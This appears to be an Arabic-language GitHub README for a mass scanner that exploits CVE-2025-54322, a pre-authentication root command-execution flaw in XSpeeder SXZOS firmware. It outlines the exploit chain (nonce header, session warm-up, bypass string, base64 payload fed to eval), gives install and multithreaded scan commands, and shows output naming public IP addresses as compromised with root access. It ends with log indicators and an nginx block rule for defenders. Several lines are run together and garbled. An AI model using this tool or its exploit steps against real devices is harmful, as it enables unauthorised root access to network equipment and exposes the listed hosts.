
CVE-2025-54322 - أداة اكتشاف سريع لثغرة 0day تنفيذ الأوامر عن بُعد بدون مصادقة في XSpeeder SXZOS
ماسح ضوئي متعدد الخيوط للثغرة CVE-2025-54322، وهي ثغرة تنفيذ أوامر عن بُعد دون مصادقة مسبقة في برامج XSpeeder SXZOS الثابتة تؤثر على أكثر من 70,000 مضيف حول العالم.
CVE-2025-54322 هي ثغرة خطيرة لتنفيذ الأوامر عن بُعد دون مصادقة مسبقة تم اكتشافها في برامج SXZOS الثابتة الخاصة بـ XSpeeder، والتي تشغل أجهزة SD-WAN والموجهات ومعدات الشبكات الحافة.
توجد الثغرة في واجهة الويب المبنية على Django في برامج SXZOS الثابتة:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() في بايثون على مدخلات المستخدم المفكوكة من base641. حساب nonce زمني لرأس X-SXZ-R
2. تسخين الجلسة عبر نقطة النهاية /webInfos/
3. صياغة حمولة ضارة مع سلسلة تجاوز (#sUserCodexsPwd)
4. ترميز الحمولة بـ base64
5. إرسال الاستغلال مع 3 معاملات استعلام بالضبط
6. يقوم الخادم بفك تشفير وتقييم الحمولة
7. تنفيذ الأوامر بصلاحيات الجذر
يتجاوز الاستغلال عدة طبقات دفاعية:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt فورًا# استنساخ المستودع
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# تثبيت التبعيات المطلوبة
pip install -r requirements.txt
أنشئ ملف requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# المسح بعدد خيوط مخصص (الافتراضي: 10)
python3 scanner.py targets.txt 20
# المسح بأقصى عدد خيوط للحصول على نتائج أسرع
python3 scanner.py targets.txt 50
# المسح بعدد خيوط محافظ
python3 scanner.py targets.txt 5
أنشئ ملف targets.txt بهدف واحد لكل سطر:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
يعرض الماسح:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مرخصة فقط.
إذا اكتشفت أنظمة ضعيفة:
إذا كنت تدير أجهزة XSpeeder SXZOS:
ابحث عن هذه المؤشرات في السجلات:
/?title=*&oIp=*&chkid=* مع حمولات base64SXZ/2.3X-SXZ-R غير عادية#sUserCodexsPwd/webInfos/ متبوعة بالمسار الجذر# قاعدة Nginx لمنع محاولات الاستغلال
location / {
if ($args ~* "chkid=") {
return 403;
}
}
تم اكتشاف هذه الثغرة تلقائيًا بواسطة pwn.ai - منصة أبحاث أمنية تعمل بالذكاء الاصطناعي.
ملاحظة مهمة: هذه هي أول ثغرة zero-day من نوع RCE قابلة للاستغلال عن بُعد يتم اكتشافها بواسطة وكيل وموثقة علنًا.
Chirag Artani
تم إنشاء هذا الماسح لمساعدة محترفي الأمن في:
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.
نرحب بالمساهمات! لا تتردد في تقديم طلب سحب (Pull Request).
للاستفسارات أو المشكلات أو الاقتراحات:
تذكر: مع القوة العظيمة تأتي مسؤولية عظيمة. استخدم هذه الأداة بأخلاقية وقانونية.
كن آمنًا. كن أخلاقيًا. كن قانونيًا.
| عدد الأهداف | الخيوط الموصى بها | الوقت المتوقع |
|---|
| 1-10 | 5 خيوط | ~1-2 دقيقة |
| 10-50 | 10 خيوط | ~3-5 دقائق |
| 50-100 | 20 خيط | ~5-10 دقائق |
| 100-500 | 30 خيط | ~10-20 دقيقة |
| 500+ | 40-50 خيط | ~20+ دقيقة |